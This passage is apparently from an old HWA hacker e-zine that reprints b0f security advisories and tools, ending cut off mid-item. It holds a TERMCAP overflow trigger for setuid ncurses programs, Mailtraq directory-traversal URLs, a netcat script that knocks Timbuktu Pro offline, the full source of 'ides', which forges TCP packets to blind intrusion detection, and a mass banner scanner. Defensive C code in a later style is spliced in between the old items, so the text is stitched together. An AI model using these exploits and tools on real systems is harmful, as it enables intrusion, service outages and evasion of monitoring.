Severity: setuid programs linked with libncurses
can be exploited to obtain root access.
Author: venglin (venglin@freebsd.lublin.pl)
Homepage: www.b0f.com
* The Problem
lubi:venglin:~> cat tescik.c
#include <ncurses.h>
main() { initscr(); }
lubi:venglin:~> cc -g -o te tescik.c -lncurses
lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'`
lubi:venglin:~> gdb ./te
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...
(gdb) run
Starting program: /usr/home/venglin/./te
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
* Vulnerable Versions
- 3.4-STABLE -- vulnerable
- 4.0-STABLE -- not tested (probably *not* vulnerable)
- 5.0-CURRENT -- *not* vulnerable
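A mitigation for the setuid case above, added here as an example and not part of the advisory or of FreeBSD's fix: clean the terminal variables before a privileged program calls initscr(). The function names, the 1023-byte TERMCAP bound and the character set allowed in TERM are assumptions made for this example.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200112L   /* setenv/unsetenv */
#endif
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define TERMCAP_MAX 1023  /* assumption: classic termcap entry buffer is 1024 bytes */
#define TERM_MAX      64  /* assumption: generous bound for a terminal type name */

/* True when the process runs with more privilege than its invoker (setuid/setgid). */
int running_privileged(void)
{
    return geteuid() != getuid() || getegid() != getgid();
}

/* A terminal name should be short and made of unremarkable characters. */
static int term_name_ok(const char *t)
{
    size_t n = strlen(t);
    if (n == 0 || n > TERM_MAX) return 0;
    for (size_t i = 0; i < n; i++)
        if (!isalnum((unsigned char)t[i]) && strchr("-+._", t[i]) == NULL)
            return 0;
    return 1;
}

/* Call before initscr(). Returns the number of variables removed. */
int scrub_terminal_env(int privileged)
{
    int removed = 0;
    const char *tc = getenv("TERMCAP");
    const char *term = getenv("TERM");

    /* A privileged program never trusts a caller-supplied capability string;
     * an unprivileged one still refuses entries longer than the classic buffer. */
    if (tc != NULL && (privileged || strlen(tc) > TERMCAP_MAX)) {
        unsetenv("TERMCAP");
        removed++;
    }
    if (term != NULL && !term_name_ok(term)) {
        unsetenv("TERM");
        removed++;
    }
    return removed;
}

/* Constructed input: TERMCAP of n 'A' bytes (the advisory used 5000) and a TERM value. */
int demo_scrub(size_t n, const char *term, int privileged)
{
    char *big = malloc(n + 1);
    if (big == NULL) return -1;
    memset(big, 'A', n);
    big[n] = '\0';
    setenv("TERMCAP", big, 1);
    setenv("TERM", term, 1);
    free(big);
    return scrub_terminal_env(privileged);
}

int main(void)
{
    int removed = demo_scrub(5000, "vt100", running_privileged());
    printf("removed %d variable(s); TERMCAP is %s\n", removed,
           getenv("TERMCAP") ? "still set" : "unset");
    return 0;
}
```

This only narrows what reaches the library; upgrading to a release listed as not vulnerable is still the fix.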
@HWA
22.0 [b0f] b0f2-NetOp.txt NetOp, Bypass of NT Security to retrieve files
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by axess 2000-04-12
_____________________________________________________________________
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 2
Advisory Name: NetOp, Bypass of NT Security to retrieve files
Date: 12/4/00
Application: NetOp Remote Control
Vendor: Danware
WWW: www.netop.dk
Severity: Any user can browse and even download
files from the remote computer
Author: axess ( axess@mail.com )
Homepage: www.b0f.com
* Overview
NetOp is a remote administrator control tool that allows you to capture
the screen and it will act as if you were in front of it.
It's a client / host based software.
* The Problem
By default there is no account set up to verify that you are authorised to use
the host software running on the server and anyone that has a client for it can
access the screen.
Default port 6502 is used.
I have done a lot of testing of this and found out that most of the people running
it don't use the accounts that can be set up to verify with an account and password
that you are allowed to use the host.
They rely on the NT security with locking the screen that should be enough.
So if we log on we get a normal screen that says login with administrator account.
Not easy to bypass, but then there is a function that you can use called file transfer.
I use that method and a screen that looks like explorer will appear and you can download
sam._ or what ever file you want and start cracking it while just bypassing all
the NT security.
* Vulnerable Versions
Version 6 is the only one tested but I believe all versions
prior to that are vulnerable.
* Fix
6.5 has just been released and uses the NT security that will fix this problem.
copyright © 1999-2000
axess , buffer0verfl0w security
www.b0f.com
@HWA
23.0 [b0f] b0f1-Mailtraq.txt Mailtraq remote file retriving
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by slash 2000-03-22
_____________________________________________________________________
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 1
Advisory Name: Mailtraq remote file retriving
Date: 3/22/00
Application: Mailtraq 1.1.4 for Win 95/98
Vendor: Fastraq Limited
WWW: www.mailtraq.com
Severity: Any user can browse and even download
files from the remote computer
Author: slash (tcsh@b0f.i-p.com)
Homepage: www.b0f.com
* Overview
Mailtraq is a message server aimed at individuals, small and medium sized
companies and home offices (SOHOS). Mailtraq's primary goal is to provide online
services to local users by storing incoming and outgoing news and mail messages
offline, then connecting to the Internet at controlled intervals to deliver
outgoing messages and collect and store incoming messages. Mailtraq provides fully
featured Mail, News and Intranet services, full disk logging of all activity,
comprehensive firewall facilities plus many other services such as a Finger client,
Mail-to-News and News-To-Mail gateways, Web Administration, etc. Mailtraq requires
either the Windows NT (Server or Workstation), Windows 95 or Windows 98 operating
systems to be running on the machine on which it is loaded.
* The Problem
By default Mailtraq installs its Webmail Administration menu, which is
accessible via http://some.domain.com/$/admin . The problem occurred when we tried
to retrieve http://some.domain.com/ . We configured Mailtraq's WWW server root directory
to be C:\Program Files\Mailtraq\websys\webmail . Since that \websys\webmail directory
doesn't contain index.html, the server returned the complete file listing of the
directory C:\Program Files\Mailtraq\websys\webmail. So we tried to exploit this a
little bit, and discovered that anyone can browse and download files on the remote
computer running Mailtraq Mail Server. Here is how to exploit it:
http://127.0.0.1/./../../../
And you should get the complete listing of files in c:\Program Files\ . When we
tried to exploit this, we could only browse files from c:\Program Files\ . When we
would add some more /../../../ to the existing URL we would get a "404 Page not
found". We played around with this a little bit and found a way to exploit this too.
To get to windows we should add some more /../../../ but a correct directory name
was required. So we did it this way:
http://127.0.0.1/../../../../../../../../../../././../../././..././.../.../windows/
Here it is!!! The complete listing of C:\windows . Now this is as far as we go.
On Windows NT machines running Mailtraq You could just get sam._ , run l0phtcrack
against it and compromise the machine.
There is also a bug that allows the remote attacker to find out in what directory
Mailtraq is installed. By inputting a large string after http://some.domain.com/
the server will return the path to Mailtraq's installation directory. Example:
http://127.0.0.1/../aaaaaaaaa[a lot of a's]aaaaaaa
The output You should get will look like this:
File "C:\Program Files\Mailtraq\websys\webmail\aaaaaa[a lot of a's]aaaaaa" could
not be found
* Vulnerable Versions
We tested version 1.1.4. on Windows 98. All versions prior to 1.1.4 are
vulnerable. We aren't sure if the Windows NT version is affected.
* Fix
At this time we aren't familiar with any fix for this bug.
copyright © 1999-2000
slash, buffer0verfl0w security
www.b0f.com
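The check whose absence the advisory describes, written as an added example (it is not Mailtraq code and not a vendor fix): decode the request path once, resolve its segments, and refuse anything that would leave the document root. The function names, the length limit and the choice to refuse all-dot segments such as "..." and segments containing ':' are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

#define MAX_URL_PATH 512   /* assumption: longer requests get a plain 404 */
#define MAX_DEPTH     64

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Percent-decode src into dst. Returns -1 on a bad escape, %00 or overflow. */
static int url_decode(const char *src, char *dst, size_t cap)
{
    size_t o = 0;
    while (*src) {
        int c = (unsigned char)*src++;
        if (c == '%') {
            int hi = hexval((unsigned char)src[0]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)src[1]);
            if (lo < 0) return -1;
            c = hi * 16 + lo;
            src += 2;
            if (c == 0) return -1;
        }
        if (o + 1 >= cap) return -1;
        dst[o++] = (char)c;
    }
    dst[o] = '\0';
    return 0;
}

/* Writes the root-relative path ("" is the root itself) to out and returns 0,
 * or returns -1 when the request must be refused. Use out only on success. */
int resolve_under_root(const char *url_path, char *out, size_t outlen)
{
    char buf[MAX_URL_PATH + 1];
    size_t starts[MAX_DEPTH];   /* offset in out where each kept segment begins */
    size_t depth = 0, o = 0;
    char *p = buf;

    if (outlen == 0 || strlen(url_path) > MAX_URL_PATH) return -1;
    if (url_decode(url_path, buf, sizeof buf) != 0) return -1;
    out[0] = '\0';
    while (*p) {
        size_t n = strcspn(p, "/\\");   /* Windows accepts both separators */
        char *seg = p;
        p += n;
        if (*p) *p++ = '\0';
        if (n == 0 || strcmp(seg, ".") == 0) continue;
        if (strcmp(seg, "..") == 0) {
            if (depth == 0) return -1;            /* would climb above the root */
            o = starts[--depth];
            out[o] = '\0';
            continue;
        }
        if (strspn(seg, ".") == n) return -1;     /* "...", "....": all dots */
        if (strchr(seg, ':') != NULL) return -1;  /* drive letters */
        if (depth == MAX_DEPTH || o + n + 2 > outlen) return -1;
        starts[depth++] = o;
        if (o > 0) out[o++] = '/';
        memcpy(out + o, seg, n);
        o += n;
        out[o] = '\0';
    }
    return 0;
}

/* Helper for the samples: returns the resolved path, or NULL if refused. */
const char *demo_resolve(const char *url_path)
{
    static char out[MAX_URL_PATH + 1];
    return resolve_under_root(url_path, out, sizeof out) == 0 ? out : NULL;
}

int main(void)
{
    /* Request paths from the advisory, plus two constructed ones. */
    const char *samples[] = {
        "/$/admin",
        "/./../../../",
        "/../../../../../../../../../../././../../././..././.../.../windows/",
        "/webmail/.../.../windows/",   /* constructed */
        "/%2e%2e/%2e%2e/windows/",     /* constructed */
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        const char *r = demo_resolve(samples[i]);
        printf("%-30.30s -> %s\n", samples[i], r ? r : "REFUSED (send a fixed 404)");
    }
    return 0;
}
```

On refusal or a missing file the server should answer with a fixed 404 body; echoing the resolved filesystem path in the error is what disclosed the installation directory.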
@HWA
24.0 [b0f] Exploit/DoS /makes Timbuktu Pro 2.0b650 stop responding to connections
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/bin/sh
# *Needs netcat in order to work......*
# Immune systems:
# Timbuktu Pro 2000
#
# Vulnerable systems:
# Timbuktu Pro 2.0b650 (Also incorrectly known as Timbukto)
#
# Exploit:
# - Connect and disconnect to port TCP/407 and port TCP/1417 will start
# listening.
# - Connect on port TCP/1417 (using a simple telnet client).
# - Disconnect from TCP/1417 (with no data exchange).
#
# Workaround:
# - Kill Timbuktu process (using pslist/pskill for example).
# - Stop Timbuktu services.
# - Start them again.
echo "Exploit:"
echo " - Connect and disconnect to port TCP/407 and port TCP/1417 will start listening."
echo " - Connect on port TCP/1417 (using a simple telnet client)."
echo " - Disconnect from TCP/1417 (with no data exchange)."
echo "Coded: eth0 from buffer0vefl0w security (b0f)"
echo "[http://b0f.freebsd.lublin.pl]"
echo "Checking if host is actually listening on port 407"
telnet $1 407 1>.timb.tmp 2>.timb.tmp &
echo "Sleeping 5 seconds..."
sleep 5
killall -9 telnet 1>/dev/null 2>/dev/null
cat .timb.tmp | grep "Connected" >/dev/null 2>&1
if [ $? -eq 0 ]; then
timb="1"
echo "[$1] is listening on port 407..."
echo "Exploiting:..."
nc $1 1417 1>/dev/null 2>/dev/null
sleep 3
killall -9 nc 1>/dev/null 2>/dev/null
echo "Done!!"
fi
if [ "$timb" != "1" ]; then
echo "[$1] Is not listening on port 407 = doesn't exist..."
fi
@HWA
25.0 [b0f] ides.c:'Intrusion Detection Evasion System'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
* ides version 0.3 - 'intrusion detection evasion system'
* (c) Jan 2000 by Mixter
*
* IDES will go into background and watch incoming traffic, inserting forged
* TCP ack, rst and fin packets for every transmitted data packet. The sessions
* will not be affected, since the sequence numbers change, but all sniffing
* and monitoring software that evaluates raw packets is possibly tricked into
* evaluating the forged data or seeing reset connections, making logging
* unreliable or impossible. As a second feature, IDES will create a custom
* amount of fake SYNs on each valid tcp connection request, transparently
* simulating coordinated/decoy scans from random source addresses.
* IDES can be used on a remote host or locally to fool sniffers, IDS and
* other network monitors and to generate random decoy probes while scanning.
* Acknowledgements: MUCH of this idea is from stran9ers (private) code, which
* is better to configure, and from horizons article in Phrack 54.
*
* Changes:
* v 0.3 - code sanitized, prevent generation of ACK storms/feedback loops
* v 0.2 - now uses a unique XOR (ph33r) challenge value for each process
*/
#define DECOYS 10 /* number of forged SYNs to send on each
tcp connection initiation */
#undef DEBUG /* stay in foreground + dump packet info */
#undef NO_INADDR /* solaris */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <fcntl.h>
#ifndef IP_HDRINCL
#define IP_HDRINCL 3
#endif
#ifndef PF_INET
#define PF_INET 2
#endif
#ifndef AF_INET
#define AF_INET PF_INET
#endif
typedef unsigned char u8;
typedef unsigned short int u16;
typedef unsigned int u32;
#ifndef NO_INADDR
#ifndef in_addr
struct in_addr
{
unsigned long int s_addr;
};
#endif
#endif
#ifndef htons
#if __BYTE_ORDER == __BIG_ENDIAN
#define ntohl(x) (x)
#define ntohs(x) (x)
#define htonl(x) (x)
#define htons(x) (x)
#else
unsigned long int htonl (unsigned long int hostlong);
unsigned short int htons (unsigned short int hostshort);
unsigned long int ntohl (unsigned long int netlong);
unsigned short int ntohs (unsigned short int netshort);
#endif
#endif
#define IP 0
#define TCP 6
#define RAW 255
struct sa
{
u16 fam, dp;
u32 add;
u8 zero[8];
}
sadd;
struct ip
{
#if __BYTE_ORDER == __LITTLE_ENDIAN
u8 ihl:4, ver:4;
#else
u8 ver:4, ihl:4;
#endif
u8 tos;
u16 tl, id, off;
u8 ttl, pro;
u16 sum;
u32 src, dst;
}
*ih;
struct tcp
{
u16 src, dst;
u32 seq, ackseq;
#if __BYTE_ORDER == __LITTLE_ENDIAN
u16 res1:4, doff:4, fin:1, syn:1, rst:1, psh:1, ack:1, urg:1, res2:2;
#else
u16 doff:4, res1:4, res2:2, urg:1, ack:1, psh:1, rst:1, syn:1, fin:1;
#endif
u16 win, sum, urp;
}
*th;
unsigned short ip_sum (unsigned short *, int);
unsigned short
ip_sum (addr, len)
unsigned short *addr;
int len;
{
register int nleft = len;
register unsigned short *w = addr;
register int sum = 0;
unsigned short answer = 0;
while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}
if (nleft == 1)
{
*(unsigned char *) (&answer) = *(unsigned char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return (answer);
}
char rseed[65535];
int rcounter = 0;
void
random_init (void)
{
int rfd = open ("/dev/urandom", O_RDONLY);
if (rfd < 0)
rfd = open ("/dev/random", O_RDONLY);
rcounter = read (rfd, rseed, 65535);
close (rfd);
}
inline long
getrandom (int min, int max)
{
if (rcounter < 2)
random_init ();
srand (rseed[rcounter] + (rseed[rcounter - 1] << 8));
rcounter -= 2;
return ((random () % (int) (((max) + 1) - (min))) + (min));
}
u32 magic;
char packet[1024], *dh;
#define GETLRANDOM (getrandom (0, 65535) * getrandom (0, 65535))
#define CLONED ((ntohl(th->seq) == (ntohl (ih->src)^magic)))
void
syndecoy (int s)
{
#ifdef DEBUG
printf ("*");
#endif
sadd.fam = AF_INET;
sadd.dp = th->dst;
sadd.add = ih->dst;
ih->ver = 4;
ih->ihl = 5;
ih->tos = 0x00;
ih->tl = sizeof (struct ip) + sizeof (struct tcp);
ih->id = getrandom (0, 65535);
ih->off = 0;
ih->ttl = getrandom (200, 255);
ih->pro = TCP;
ih->sum = 0;
ih->src = htonl (GETLRANDOM);
th->seq = htonl (ntohl (ih->src) ^ magic);
th->ackseq = 0;
th->res1 = 0;
th->doff = 0;
th->fin = 0;
th->syn = 1;
th->ack = 0;
th->rst = 0;
th->psh = 0;
th->ack = 0;
th->urg = 1;
th->res2 = 0;
th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + 1) & ~1);
ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + 1) & ~1);
memset (dh, 0, 256);
sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp), 0, (struct sockaddr *) &sadd, sizeof (sadd));
}
void
idscrew (int s)
{
int flg = ((th->ack) && (!th->psh)), rl = getrandom (0, 256);
#ifdef DEBUG
printf (".");
#endif
sadd.fam = AF_INET;
sadd.dp = th->dst;
sadd.add = ih->dst;
ih->ver = 4;
ih->ihl = 5;
ih->tos = 0x00;
ih->tl = sizeof (struct ip) + sizeof (struct tcp);
ih->id = getrandom (0, 65535);
ih->off = 0;
ih->ttl = getrandom (200, 255);
ih->pro = TCP;
ih->sum = 0;
th->seq = htonl (ntohl (ih->src) ^ magic);
th->ackseq = htonl (GETLRANDOM);
th->res1 = 0;
th->doff = 0;
th->fin = 0;
th->syn = 0;
th->ack = 1;
th->rst = 0;
th->psh = 1;
th->ack = 0;
th->urg = 0;
th->res2 = 0;
memset (dh, 0, 256);
th->ack = 0;
th->psh = 0;
th->rst = 1;
th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + 1) & ~1);
ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + 1) & ~1);
sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp), 0, (struct sockaddr *) &sadd, sizeof (sadd));
if (flg) /* this is necessary to prevent ev1l ACK st0rmz#@!$ */
return;
th->rst = 0;
th->fin = 1;
th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + 1) & ~1);
ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + 1) & ~1);
sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp), 0, (struct sockaddr *) &sadd, sizeof (sadd));
ih->tl += rl;
th->fin = 0;
th->ack = 1;
memcpy (dh, rseed + getrandom (0, 5000), rl);
th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + rl + 1) & ~1);
ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + rl + 1) & ~1);
sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp) + rl, 0, (struct sockaddr *) &sadd, sizeof (sadd));
th->psh = 1;
memcpy (dh, rseed + getrandom (0, 5000), rl);
th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + rl + 1) & ~1);
ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + rl + 1) & ~1);
sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp) + rl, 0, (struct sockaddr *) &sadd, sizeof (sadd));
ih->tl -= rl;
}
int
main (int argc, char **argv)
{
char *opt = "1";
int i = 0, s = socket (AF_INET, SOCK_RAW, TCP);
magic = GETLRANDOM; /* initialize our magic challenge */
ih = (struct ip *) packet;
th = (struct tcp *) (packet + sizeof (struct ip));
dh = (char *) (packet + sizeof (struct ip) + sizeof (struct tcp));
#ifndef DEBUG
if ((i = fork ()))
{
printf ("%s launching into the background (pid: %d)\n", argv[0], i);
exit (0);
}
#endif
if (s < 0)
perror ("");
if (setsockopt (s, IP, IP_HDRINCL, opt, sizeof (opt)) < 0)
perror ("");
while (1)
{
if (read (s, packet, 1020) > 0)
if ((!CLONED) && (th->ack))
{
#ifdef DEBUG
printf ("Seq: %lu, ack: %lu, src: %lu (S%dA%dP%dF%dR%dU%d)\n",
ntohl (th->seq), ntohl (th->ackseq), ntohl (ih->src),
th->syn, th->ack, th->psh, th->fin, th->rst, th->urg);
fflush (stdout);
#endif
if (th->syn)
for (i = 0; i < DECOYS; i++)
syndecoy (s);
else if ((!th->fin) && (!th->rst))
idscrew (s);
}
memset (packet, 0, 1024);
}
return 0;
}
/* $t34lthy OoOoO .
h4x3r _______( o__ o
|___\ 0|_ | _ ( _| O
/ 0|___||_O(___| ( 1 4m h1d1ng!@$ ) */
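A monitor avoids being fed these forged segments by applying the checks the receiving host applies before it accepts data. The following added example (not part of ides.c or of any IDS product) refuses segments with an impossible TCP data offset, which ides.c sets to 0 on everything it forges, and segments whose TCP checksum fails against the pseudo-header, which ides.c leaves out of its sum; the function names and the sample packet are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum verdict { SEG_OK = 0, SEG_TRUNCATED, SEG_BAD_IP, SEG_NOT_TCP,
               SEG_BAD_DOFF, SEG_BAD_CSUM };

/* One's-complement sum of big-endian 16-bit words, folded to 16 bits. */
static uint32_t sum16(const uint8_t *p, size_t n, uint32_t acc)
{
    while (n > 1) { acc += (uint32_t)(p[0] << 8 | p[1]); p += 2; n -= 2; }
    if (n) acc += (uint32_t)(p[0] << 8);
    while (acc >> 16) acc = (acc & 0xffff) + (acc >> 16);
    return acc;
}

/* Checksum over pseudo-header + TCP segment. With the stored checksum in
 * place the result is 0; with the field zeroed it is the value to store. */
static uint16_t tcp_checksum(const uint8_t *ip, size_t ihl, size_t tcplen)
{
    uint8_t pseudo[4] = { 0, 6, (uint8_t)(tcplen >> 8), (uint8_t)tcplen };
    uint32_t acc = sum16(ip + 12, 8, 0);       /* source and destination address */
    acc = sum16(pseudo, 4, acc);
    acc = sum16(ip + ihl, tcplen, acc);
    return (uint16_t)~acc;
}

/* Would the destination's TCP accept this segment? If not, a monitor must not
 * feed it to stream reassembly or treat its RST/FIN as the end of a session. */
enum verdict check_segment(const uint8_t *pkt, size_t len)
{
    if (len < 20) return SEG_TRUNCATED;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    size_t total = (size_t)(pkt[2] << 8 | pkt[3]);
    if ((pkt[0] >> 4) != 4 || ihl < 20 || total < ihl || total > len)
        return SEG_BAD_IP;
    if (pkt[9] != 6) return SEG_NOT_TCP;
    if (total - ihl < 20) return SEG_TRUNCATED;
    size_t doff = (size_t)(pkt[ihl + 12] >> 4) * 4;
    if (doff < 20 || doff > total - ihl) return SEG_BAD_DOFF;
    if (tcp_checksum(pkt, ihl, total - ihl) != 0) return SEG_BAD_CSUM;
    return SEG_OK;
}

/* Constructed sample: 10.0.0.1:1025 -> 10.0.0.2:80, ACK|PSH, 4 payload bytes.
 * mode 0: valid; mode 1: data offset 0 (as ides.c forges); mode 2: payload
 * changed after the checksum was computed. pkt must hold at least 44 bytes. */
size_t build_sample(uint8_t *pkt, int mode)
{
    static const uint8_t tmpl[44] = {
        0x45,0,0,44, 0,1,0,0, 64,6,0,0, 10,0,0,1, 10,0,0,2,          /* IPv4 */
        0x04,0x01,0,80, 0,0,0,1, 0,0,0,1, 0x50,0x18,0x20,0, 0,0,0,0, /* TCP  */
        'd','a','t','a' };
    memcpy(pkt, tmpl, sizeof tmpl);
    uint16_t c = tcp_checksum(pkt, 20, 24);
    pkt[36] = (uint8_t)(c >> 8);
    pkt[37] = (uint8_t)c;
    if (mode == 1) pkt[32] &= 0x0f;
    if (mode == 2) pkt[40] ^= 0xff;
    return sizeof tmpl;
}

enum verdict demo_verdict(int mode)
{
    uint8_t pkt[64];
    size_t len = build_sample(pkt, mode);
    return check_segment(pkt, len);
}

int main(void)
{
    static const char *names[] = { "ok", "truncated", "bad ip header",
                                   "not tcp", "bad data offset", "bad checksum" };
    for (int mode = 0; mode < 3; mode++)
        printf("sample %d: %s\n", mode, names[demo_verdict(mode)]);
    return 0;
}
```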
@HWA
26.0 [b0f] lscan2.c Lamerz Scan, a small fork()ing scanner..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. used to log bind, pop3, imap, etc banners from many
hosts quickly.
/* lscan2.c - 1999 (c) Mixter */
/* compile: gcc -O3 -s -Wall lscan2.c -o lscan */
#define INITIAL_TIMEOUT 5 // how long to wait for a connection
#define WAIT_FORK 550000 // wait 1/2 second between forks
#define BIND "ns.log"
#define POP "pop.log"
#define IMAP "imap.log"
#define RPC "mountd.log"
#define FTP "ftp.log"
#define STATUSLOG "status.log"
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#define SSA sizeof(struct sockaddr)
#define SOX socket(AF_INET,SOCK_STREAM,0)
int s1,s2,s3,s4,s5;
int ncon(int tsock, char *ip, int port, int timeout);
void invoke(struct hostent *host, int port); // udp send
void usage(char *name, char *text); // print usage & die
int validip(char *ip); // check and correct ip address
void fchk(FILE *fp); // check a file
void timedout(int sig); // dummy function
int background(); // background a process
void scan0r(char *ip); // log services for one ip
char buf[75]; // read the first 75 chars from a server
int main(int argc,char **argv)
{
FILE *data,*err;
char ip[30];
int pid;
if((argc!=2)) usage(argv[0],"<ipfile>");
fprintf(stderr,"\033[0;34mlamerz scan 1.0 by \033[5mMixter\033[0m\n");
fprintf(stderr,"\033[0;34mscanning from %s (pid: %d)\033[0m\n"
,argv[1] ,(pid=background()));
signal(SIGHUP,SIG_IGN);
signal(SIGCHLD,SIG_IGN); // zombies suck
fchk(data=fopen(argv[1],"r"));
fchk(err=fopen(STATUSLOG,"a"));
fprintf(err,"Started new session. File: %s, PID: %d\n",argv[1],pid);
while(!feof(data))
{
fscanf(data,"%s\n",ip);
if(validip(ip)==1)
{
usleep(WAIT_FORK); // wait between fork()'s (1/2 second default)
if ((pid=vfork()) < 0) { perror("fork"); exit(1); }
if (pid==0) // child
{
scan0r(ip); // collect data for this host & save into files
raise(9);
return 0;
}
}
else fprintf(err,"Invalid IP: %s\n",ip);
}
sleep(60); // wait for the last childs
fprintf(err,"Finished session. File: %s\n",argv[1]);
return 0;
}
void scan0r(char *ip)
{
int tout=INITIAL_TIMEOUT,
s1=SOX,s2=SOX,s3=SOX,s4=SOX,s5=SOX,
bind,pop,imap,rpc,ftp;
FILE *f1,*f2,*f3,*f4,*f5;
fchk(f1=fopen(BIND,"a"));
fchk(f2=fopen(POP,"a"));
fchk(f3=fopen(IMAP,"a"));
fchk(f4=fopen(RPC,"a"));
fchk(f5=fopen(FTP,"a"));
rpc=ncon(s4,ip,635,tout); // we check port 635 because 2.2b29
// mountd always binds on that one
if(rpc==-9) return; // host timed out
else if(rpc>=0) fprintf(f4,"%s\n",ip); // log mountd connect
pop=ncon(s2,ip,110,tout);
if(pop==-9) return; // host timed out
else if(pop>=0)
{
bzero(buf,sizeof(buf));
read(s2,buf,sizeof(buf)); // get popper version
fprintf(f2,"%s %s\n",ip,buf); // log popper connect
}
pop=ncon(s2,ip,109,tout);
if(pop==-9) return; // host timed out
else if(pop>=0)
{
bzero(buf,sizeof(buf));
read(s2,buf,sizeof(buf)); // get popper version
fprintf(f2,"%s !POP2! %s\n",ip,buf); // log popper connect
}
imap=ncon(s3,ip,143,tout);
if(imap==-9) return; // host timed out
else if(imap>=0)
{
bzero(buf,sizeof(buf));
read(s3,buf,sizeof(buf)); // get imap version
fprintf(f3,"%s %s\n",ip,buf); // log imap connect
}
bind=ncon(s1,ip,53,tout);
tout -= 2; // wait 2 seconds less
if(bind==-9) return; // host timed out
else if(bind>=0) // log dns connect
fprintf(f1,"%s\n",ip);
ftp=ncon(s5,ip,21,tout);
if(ftp==-9) return; // host timed out
else if(ftp>=0)
{
bzero(buf,sizeof(buf));
read(s5,buf,sizeof(buf)); // get ftp version
fprintf(f5,"%s %s\n",ip,buf); // log ftp connect
}
fclose(f1); fclose(f2); fclose(f3); fclose(f4); fclose(f5);
raise(9);
return;
}
int ncon(int tsock, char *ip, int port, int timeout) {
int probe;
struct sockaddr_in target;
target.sin_family = AF_INET;
target.sin_port = htons(port);
target.sin_addr.s_addr = inet_addr(ip);
bzero(&target.sin_zero,8);
alarm(0); signal(SIGALRM,timedout); alarm(timeout);
probe = connect(tsock, (struct sockaddr *)&target, SSA);
alarm(0);
if(probe < 0) {
close(tsock);
if(errno == EINTR) return -9;
if(errno == ETIMEDOUT) return -9;
}
return probe;
}
void usage(char *name,char *text)
{
printf("usage: %s %s\n",name,text);
exit(EXIT_FAILURE);
}
int validip(char *ip)
{
int a,b,c,d,*x;
sscanf(ip,"%d.%d.%d.%d",&a,&b,&c,&d);
x=&a;
if(*x < 0) return 0; if(*x > 255) return 0;
x=&b;
if(*x < 0) return 0; if(*x > 255) return 0;
x=&c;
if(*x < 0) return 0; if(*x > 255) return 0;
x=&d;
if(*x < 0) return 0; if(*x > 255) return 0;
sprintf(ip,"%d.%d.%d.%d",a,b,c,d); // truncate possible garbage data
return 1;
}
void fchk(FILE *fp)
{
if(fp==NULL)
{
fprintf(stderr,"Error opening file or socket.\n");
exit(EXIT_FAILURE);
}
return;
}
void timedout(int sig)
{
alarm(0);
raise(9);
}
int background()
{
int pid;
signal(SIGCHLD,SIG_IGN);
pid = fork();
if(pid<0) return -1; // fork failed
if(pid>0)
{
sleep(1);
exit(EXIT_SUCCESS); // parent, exit
}
if(pid==0)
{
signal(SIGCHLD,SIG_DFL);
return getpid(); // child, go on
}
return -2; // shouldnt happen
}
@HWA
27.0 [b0f] Pseudo Cryptographic Filesystem..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. Creates a fake CFS directory that is indistinguishable from real ones
/*
